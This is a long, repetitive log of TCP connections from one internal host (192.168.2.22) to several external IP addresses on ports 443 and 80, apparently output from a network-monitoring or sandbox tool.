Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 63.250.43.10:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 63.250.43.10:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 63.250.43.10:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 207.174.214.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.33.130.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 63.250.43.9:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 195.177.124.30:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 77.37.50.35:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 77.37.50.35:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 77.37.50.35:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 77.37.50.35:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 77.37.50.35:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 77.37.50.35:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 77.37.50.35:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 77.37.50.35:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 77.37.50.35:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 147.79.119.239:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 147.79.119.239:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 147.79.119.239:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 147.79.119.239:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 20.23.238.122:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 20.23.238.122:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 147.79.119.141:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 147.79.119.141:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 147.79.119.141:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 147.79.119.141:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 147.79.119.141:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 147.79.116.130:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 147.79.116.130:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 147.79.116.130:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 147.79.116.130:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 147.79.116.130:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 147.79.116.130:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 147.79.116.130:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 147.79.116.130:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 147.79.116.130:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 147.79.119.239:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 147.79.119.239:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 147.79.119.239:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 147.79.119.239:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 147.79.119.239:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 15.197.148.33:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 15.197.148.33:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 217.160.0.236:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 217.160.0.236:80
Source: global traffic	TCP traffic: 15.197.148.33:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 15.197.148.33:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 15.197.148.33:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 15.197.148.33:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 15.197.148.33:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 15.197.148.33:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 15.197.148.33:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 63.250.43.10:443
Source: global traffic	TCP traffic: 63.250.43.10:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 63.250.43.10:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 63.250.43.10:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 195.177.124.30:443
Source: global traffic	TCP traffic: 195.177.124.30:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 104.21.3.222:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 104.21.3.222:443
